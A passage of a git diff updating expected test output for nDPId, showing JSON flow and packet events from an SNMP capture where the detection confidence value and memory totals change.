00741{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1597328710051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1597328710051,"pkt":"AAwpOzE1AAAAQZqWCABFAAECAAUAAP8RqWJxE5xvh8l8N9QuAKIA7p+NMIHjAgEDMA0CASMCAgXcBAEBAgEDBDMwMQQMgAAACQMAqrvMAAEAAgEMAgIJkgQKU0hBMU5PUFJJVgQMcPbtNC5tixaBN+YcBAAwgZkEDIAAAAkDAKq7zAABAAQAp4GGAgEqAgEAAgEAMHswDwYIKwYBAgEBAwBDAwO+oTAXBgorBgEGAwEBBAEABgkrBgEGAwEBBQQwDwYKKwYBAgECAgEBAgIBAjAZBgorBgECAQICAQICBAtFdGhlcm5ldDAvMTAPBgorBgECAQICAQMCAgEGMBIGDCsGAQQBCQICAQEUAgQCdXA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328734790,"flow_last_seen":1597328734790,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1597328734790,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00789{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1597328734790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1597328734790,"pkt":"AAwpO2J6AAAAsIjCCABFAAEiAAYAAP8Rvb7NUyTkoK5qINQuAKIBDjinMIIBAgIBAzANAgElAgIF3AQBAwIBAwQ7MDkEDIAAAAkDAKq7zAABAAIBDAICCaoEClNIQTFBRVMxMjgEDPKVtczhvcY8vhvJVAQIsS3M0yiHjgUEgbAnmr8wOCOyncERaoSBQmnUCi+GoiiHqqCMFm1apQAmwk\/cF1kswlENhkIfwuB9kMILtKYuWyXXhtZBleYhoJQEJYL7o1K69bHQdMdklHbovW30zBhWTTYkhrDbN4HddHDCYjhho5GVn7THewhnReV4IFApn9hzgyZDXzSTb2D\/0RJlFbaWfzYDq0UV1+MA7WWFcwUGZiNX1Ldy1p\/JOH\/FaH0e0KzJstFu7lv44GdmqQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328734790,"flow_last_seen":1597328734790,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1597328734790,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328734790,"flow_last_seen":1597328734790,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1597328734790,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1597328742081,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1597328742081,"pkt":"AAwpO2J6AAAAsIjCCABFAAENAAcAAP8RvdLNUyTkoK5qINQuAKIA+WP9MIHuAgEDMA0CAScCAgXcBAEDAgEDBDswOQQMgAAACQMAqrvMAAEAAgEMAgIJsgQKU0hBMUFFUzEyOAQMO\/P\/PiMrdy+zI+pWBAixLczTKIeOBgSBnCB4NWdRsPt\/T9sXiMHAl69GjDJCReyQSzQtmF\/nJsUYLVpgPIp8uZxxPNbTjAYUMQF1Osi1p+iIFHpG7RpGbbDoCSdQgbLhTwfCVCvu95CHITG6rLcZ3QulV6HanbKQFQQW+YRQ9YjpumIMl5\/KtH3Wg4qxgFbt6UHjjb8VdU58\/THnGpgoaAoCTQPlYaIf1lQq7RYRPcJRLqyyuw=="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328757701,"flow_last_seen":1597328757701,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1597328757701,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1597328757701,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1597328757701,"pkt":"AAwpbM85AAAAgfGMCABFAAEMAAgAAP8R+8t8NcSwZ\/gWL9QuAKIA+FTTMIHtAgEDMA0CASgCAgXcBAEAAgEDBCkwJwQMgAAACQMAqrvMAAEAAgEMAgIJwQQMTk9BVVRITk9QUklWBAAEADCBrQQMgAAACQMAqrvMAAEABACngZoCAS8CAQACAQAwgY4wDwYIKwYBAgEBAwBDAwPRPjAXBgorBgEGAwEBBAEABgkrBgEGAwEBBQMwDwYKKwYBAgECAgEBAgIBAjAZBgorBgECAQICAQICBAtFdGhlcm5ldDAvMTAPBgorBgECAQICAQMCAgEGMCUGDCsGAQQBCQICAQEUAgQVYWRtaW5pc3RyYXRpdmVseSBkb3du"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328757701,"flow_last_seen":1597328757701,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1597328757701,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597328757701,"flow_last_seen":1597328757701,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1597328757701,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1597328765050,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":262,"pkt_l4_len":228,"thread_ts_msec":1597328765050,"pkt":"AAwpbM85AAAAgfGMCABFAAD4AAkAAP8R+958NcSwZ\/gWL9QuAKIA5B3\/MIHZAgEDMA0CASkCAgXcBAEAAgEDBCkwJwQMgAAACQMAqrvMAAEAAgEMAgIJyQQMTk9BVVRITk9QUklWBAAEADCBmQQMgAAACQMAqrvMAAEABACngYYCATACAQACAQAwezAPBggrBgECAQEDAEMDA9QeMBcGCisGAQYDAQEEAQAGCSsGAQYDAQEFBDAPBgorBgECAQICAQECAgECMBkGCisGAQIBAgIBAgIEC0V0aGVybmV0MC8xMA8GCisGAQIBAgIBAwICAQYwEgYMKwYBBAEJAgIBARQCBAJ1cA=="} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":63,"packets-processed":62,"total-skipped-flows":0,"total-l4-payload-len":7038,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":4,"total-updates":0,"current-active-flows":4,"total-active-flows":15,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":90,"global_ts_msec":1643702947966} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702947966,"flow_last_seen":1643702947966,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1643702947966,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":231,"pkt_l4_len":193,"thread_ts_msec":1643702947966,"pkt":"AAAAAAAAAAEAAAAIgQADjAgARcAA1To\/AABAETBgCucChgpI9wQAoe6gAMF5TzCCALUCAQEEBGFkc2yiggCoAgJkLgIBEwIBATCCAJowggCWBg8rBgEEAa1zWwEBAQEBDwEEgYJCR01QAQAAAAAAAAEwMDAwMDAAAAAAAAAAAAAAAABSMS42MS4xMi4wMAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAQAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702947966,"flow_last_seen":1643702947966,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702947966,"flow_last_seen":1643702947966,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597328648399,"flow_last_seen":1597328660640,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"200.76.132.137","dst_ip":"189.111.255.214","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328704045,"flow_last_seen":1597328710051,"flow_idle_time":200000,"flow_min_l4_payload_len":230,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328757701,"flow_last_seen":1597328765050,"flow_idle_time":200000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328734790,"flow_last_seen":1597328742081,"flow_idle_time":200000,"flow_min_l4_payload_len":241,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328704045,"flow_last_seen":1597328710051,"flow_idle_time":200000,"flow_min_l4_payload_len":230,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"113.19.156.111","dst_ip":"135.201.124.55","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328757701,"flow_last_seen":1597328765050,"flow_idle_time":200000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"124.53.196.176","dst_ip":"103.248.22.47","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1597328734790,"flow_last_seen":1597328742081,"flow_idle_time":200000,"flow_min_l4_payload_len":241,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1643702947966,"l3_proto":"ip4","src_ip":"205.83.36.228","dst_ip":"160.174.106.32","src_port":54318,"dst_port":162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1643702958965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":231,"pkt_l4_len":193,"thread_ts_msec":1643702958965,"pkt":"AAAAAAAAAAEAAAAIgQADjAgARcAA1fKQAABAEXgOCucChgpI9wQAoe6gAMFeTzCCALUCAQEEBGFkc2yiggCoAgJkSQIBEwIBATCCAJowggCWBg8rBgEEAa1zWwEBAQEBDwEEgYJCR01QAQAAAAAAAAEwMDAwMDAAAAAAAAAAAAAAAABSMS42MS4xMi4wMAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAQAA"} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1643702975965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":231,"pkt_l4_len":193,"thread_ts_msec":1643702975965,"pkt":"AAAAAAAAAAEAAAAIgQADjAgARcAA1RJZAABAEVhGCucChgpI9wQAoe6gAME\/TzCCALUCAQEEBGFkc2yiggCoAgJkaAIBEwIBATCCAJowggCWBg8rBgEEAa1zWwEBAQEBDwEEgYJCR01QAQAAAAAAAAEwMDAwMDAAAAAAAAAAAAAAAABSMS42MS4xMi4wMAAAAAAAAAAAAAAAAAAAAAAAAAEAAAABAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAQAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702987695,"flow_last_seen":1643702987695,"flow_idle_time":200000,"flow_min_l4_payload_len":1097,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":1097,"midstream":0,"thread_ts_msec":1643702987695,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1643702987695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1143,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1143,"pkt_l4_len":1105,"thread_ts_msec":1643702987695,"pkt":"AAAAAAAAAAUAAAAIgQAFHAgARQAEZQAAQAA7ESDXCmMIWApk\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\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"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702987695,"flow_last_seen":1643702987695,"flow_idle_time":200000,"flow_min_l4_payload_len":1097,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":1097,"midstream":0,"thread_ts_msec":1643702987695,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643702987695,"flow_last_seen":1643702987695,"flow_idle_time":200000,"flow_min_l4_payload_len":1097,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":1097,"midstream":0,"thread_ts_msec":1643702987695,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1643702987761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":75,"pkt_l4_len":37,"thread_ts_msec":1643702987761,"pkt":"AAAAAAAAAAUAAAAIgQAFHAgARQAAOaWFAAA+Ebx9CmT9kgpjCFgAoajqACXVjjAbAgEBBAZwdWJsaWOiDgIEJhJ9vwIBAQIBADAA"} -00648{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643702987695,"flow_last_seen":1643702987761,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1643702987761,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643702987695,"flow_last_seen":1643702987761,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1643702987761,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
01195{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1643702987763,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":611,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":611,"pkt_l4_len":573,"thread_ts_msec":1643702987763,"pkt":"AAAAAAAAAAUAAAAIgQAFHAgARQACUQAAQAA7ESLrCmMIWApk\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\/BQAwDwYLKwYBAgEfAQEBBnYFADAPBgsrBgECAR8BAQEKFAUAMA8GCysGAQIBHwEBAQZfBQAwDwYLKwYBAgEfAQEBCkIFADAPBgsrBgECAR8BAQEKXwUAMA8GCysGAQIBHwEBAQZgBQA="} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1643702987695,"flow_last_seen":1643702987801,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":3593,"flow_avg_l4_payload_len":598,"midstream":0,"thread_ts_msec":1643703001963,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1643702947966,"flow_last_seen":1643703001963,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643703001963,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1643702987695,"flow_last_seen":1643702987801,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1097,"flow_tot_l4_payload_len":3593,"flow_avg_l4_payload_len":598,"midstream":0,"thread_ts_msec":1643703001963,"l3_proto":"ip4","src_ip":"10.99.8.88","dst_ip":"10.100.253.146","src_port":43242,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1643702947966,"flow_last_seen":1643703001963,"flow_idle_time":200000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1643703001963,"l3_proto":"ip4","src_ip":"10.231.2.134","dst_ip":"10.72.247.4","src_port":161,"dst_port":61088,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":72,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":72,"packets-processed":72,"total-skipped-flows":0,"total-l4-payload-len":11371,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":17,"total-detection-updates":5,"total-updates":0,"current-active-flows":0,"total-active-flows":17,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":108,"global_ts_msec":1643703001963} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 72/72 @@ -114,9 +114,9 @@ ~~ total active/idle flows...: 17/17 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5888406 bytes -~~ total memory freed........: 5888406 bytes -~~ total allocations/frees...: 118248/118248 +~~ total memory allocated....: 6022040 bytes +~~ total memory freed........: 6022040 bytes +~~ total allocations/frees...: 121010/121010 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 1911 chars diff --git a/test/results/soap.pcap.out b/test/results/soap.pcap.out index eac05ca5a..edd4524a0 100644 --- a/test/results/soap.pcap.out +++ b/test/results/soap.pcap.out 
